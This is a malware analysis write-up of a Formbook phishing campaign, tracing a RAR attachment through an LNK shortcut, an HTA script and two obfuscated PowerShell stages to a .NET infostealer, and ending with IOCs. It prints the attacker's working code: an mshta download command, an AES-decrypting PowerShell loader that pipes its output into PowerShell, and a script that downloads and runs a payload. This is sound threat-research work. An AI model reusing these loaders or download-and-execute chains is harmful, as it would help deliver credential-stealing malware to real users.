1. Initial foothold
The attacker sent an email with an attachment named “brochure-for-2023-elite-events.rar
”. This rar file contains only one lnk
(shortcut) file named: brochure-for-2023-elite-events.pdf.lnk
. If the user does not pay attention and extracts the file, it will be displayed as a PDF icon like the following:
The analysis of this lnk file reveals that it utilizes powershell.exe
to execute an hta
script.
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" \W*\\\*2\\\msh*e ('http'+'://thanhancompany[.]com/ta/pintu'+'.hta')
2. Analyzing HTA script
Download the file pintu.hta
for analysis. This file contains a VBScript code snippet as follows:
To facilitate the deobfuscation of the code snippet above, I have modified it as follows:
The modified pintu.hta
file is executed, resulting in a Vbscript containing a function that executes a subsequent PowerShell script.
3. Analyzing the 1st Powershell script
ZAA = "powershell[.]exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $xbFz = 'AAAAAAAAAAAAAAAAAAAAAJdvrhrN5YvnQDuOBHjZkKQBQBWq7g/BqHoljVe1piiopnWmXE1HRnwJG/6Na9hUKa79iqZh9y+wn4+kzAAlzD85MdKFFOBhAhchbdcmCYl/JH7upYbQ39jEUMnnhdgbq4jLkewjKf+KbwDItaZamfTDsOFaJvrzsndxNKD5O7xv5WganAeSUbBiESZnv4hzbgAQVNW9+Ic9OCFhhVz6XBi9vBLLIS8B3lr9+bIpXc06HfXj+QXGzaUIl1bcY32r0C5UcmbshIQ+JAd4VgiIE5LNXajgWbqCDrce3Ej6v9b58Pb4ox5ljPJgxu2TJUA8gicsxE/ws5pJ49Docx3fkhq/j3G49owfZ2Pn2PBAq4eJ1aSQ64NTbotuWLHKBSVycqZAawr+dX2CmfMT68dWzmyneVK1hocB3RCbRrUr64aEscvQL+UKBqM1wYnuvO7atyhuAn2yfOsjxS6f3N47Crs1/fzH0JWQ/qb9ABNrGwmeo7jCQYBk67Yo9clvJtocynzeQy1d20puVEoF2pUISYvSRBaToYiFwhPM0R9pGwnlC7qyBlepmZ5zfLAeJJ3NkZyRX9MXxgNf+ZOW+0N5c4lJA2KzbtyWakcmBSS1GTLaZw9BL4Ota2QaUNdx+lVipYwILt1TMME0n7qoEGDYvAzsD3ML8hL5ruwYVGIxUkn8uEgkp9M23Oxiii+GG5mJUQHRwonMomATOefw/LUVcwox8NXFojcyPTSAgP3EBmtYTai3SFhTh0uYeWGgy95imVnfCFdkKx12dDCYRFnv17lOiQnIhuFXmwuF6VeXMgPaA+yxzbU3i1yhQ2Z6zBeFadSD/IkXTagIdPbU0jZrrB7lMsLqaNHeACVtBmC6AsaCE7cKicTd1cOUGLEesNL4B7AJxnYj2G56LEkYHOwpjn5lqOeX5dTwFjSpb1DFP9mbvjFkC+pHWL4c97/PXeLaNjVJgafxi62HjK6zKQYcoTbiqIMoxTRLRFeOYNDmELdA';$HMTijTI = 'bllXeHFBWFhNYU9kcHFnRFNSbk1EQVVSUmJqQm5Wb0w=';$BfslXFB = New-Object 'System.Security.Cryptography.AesManaged';$BfslXFB.Mode = [System.Security.Cryptography.CipherMode]::ECB;$BfslXFB.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$BfslXFB.BlockSize = 128;$BfslXFB.KeySize = 256;$BfslXFB.Key = [System.Convert]::FromBase64String($HMTijTI);$JmaZB = [System.Convert]::FromBase64String($xbFz);$myyVlryP = $JmaZB[0..15];$BfslXFB.IV = $myyVlryP;$xgdtNsuBK = $BfslXFB.CreateDecryptor();$KbcpSLgDq = $xgdtNsuBK.TransformFinalBlock($JmaZB, 16, $JmaZB.Length - 16);$BfslXFB.Dispose();$bDcpNBr = New-Object System.IO.MemoryStream( , $KbcpSLgDq );$OmEpFPG = New-Object System.IO.MemoryStream;$DswuaJEln = New-Object System.IO.Compression.GzipStream $bDcpNBr, ([IO.Compression.CompressionMode]::Decompress);$DswuaJEln.CopyTo( $OmEpFPG );$DswuaJEln.Close();$bDcpNBr.Close();[byte[]] $dhbwdLTm = $OmEpFPG.ToArray();$SRunF = [System.Text.Encoding]::UTF8.GetString($dhbwdLTm);$SRunF | powershell - }"
The script performs the following tasks:
- Decode the base64 string assigned to the variable
$xbFz
and uses the first 16 bytes as the IV, while the remaining part is the encrypted data:
- Decode the base64 string assigned to the variable
$HMTijTI
and use it as the AES key:
- Using the key and IV, decrypt the encrypted data using AES in mode
$BfslXFB.Mode = [System.Security.Cryptography.CipherMode]::ECB
:
- Based on the result of the first two bytes being
0x1F 0x8B
, we know that the decrypted data has been compressed using Gzip. Decompressing this data yields the next PowerShell script:
4. Analyzing the 2nd Powershell script
The important part of this script is as follows:
function Dlt($iZq)
{
$IBY = 6399;
$dtu = $Null;
foreach($kKX in $iZq)
{
$dtu += [char]($kKX - $IBY)
};
return $dtu
};
function RPJ()
{
$oUv = $env: AppData + '\';$DASUDIl= $env:AppData;$GXIrywM = $DASUDIl + '\blank.pdf ';If(Test-Path -Path $GXIrywM){Invoke-Item $GXIrywM;}Else{ $kjrkrCO = zPg (Dlt @(6503,6515,6515,6511,6514,6457,6446,6446,6508,6496,6502,6445,6518,6498,6510,6510,6508,6499,6445,6510,6513,6502,6446,6516,6511,6507,6510,6496,6499,6514,6446,6449,6447,6448,6455,6446,6447,6452,6446,6497,6507,6496,6509,6506,6445,6511,6499,6501));lWh $GXIrywM $kjrkrCO;Invoke-Item $GXIrywM;};;;$DauGlabYW = $oUv + '
883.exe '; if (Test-Path -Path $DauGlabYW){pmh $DauGlabYW;}Else{ $ZbmZaJRahvY = zPg (Dlt @(6503,6515,6515,6511,6514,6457,6446,6446,6515,6503,6496,6509,6503,6496,6509,6498,6510,6508,6511,6496,6509,6520,6445,6498,6510,6508,6446,6502,6513,6504,6511,6446,6455,6455,6450,6445,6500,6519,6500));lWh $DauGlabYW $ZbmZaJRahvY;pmh $DauGlabYW;};;}RPJ;
It can be observed that it will use the Dlt
function to decode the download addresses of the files (next stage payloads). By rewriting this function in Python and performing the decoding, we obtain the download addresses for the payload and decoy PDF as follows:
[+] Defanged URL(s):
hxxps://mag[.]wcoomd.org/uploads/2018/05/blank.pdf
hxxps://thanhancompany[.]com/grip/883.exe
5. Formbook payload
At the time of analysis, I was able to successfully download the payload, its sha256 is: 00f20471ea61f5b0f5a1e2e9be722369ea515aaea80283aa046bd47e51f952e4
The .NET payload, when executed, will unpack the final payload, which is the payload of the FormBook malware (this is likely a new build of the malware).
Utilize Fakenet and monitor the payload generation process to generate traffic to hosts:
6. IOCs:
hxxp://thanhancompany[.]com/ta/pintu.hta | Hta script |
hxxps://mag[.]wcoomd.org/uploads/2018/05/blank.pdf | Decoy PDF |
hxxps://thanhancompany[.]com/grip/883.exe | Payload URI |
00f20471ea61f5b0f5a1e2e9be722369ea515aaea80283aa046bd47e51f952e4 | Payload SHA256 |
End.
m4n0w4r
[…] Article Link: [QuickNote] Examining Formbook Campaign via Phishing Emails | 0day in {REA_TEAM} […]
[…] 0day in {REA_TEAM}[QuickNote] Examining Formbook Campaign via Phishing Emails […]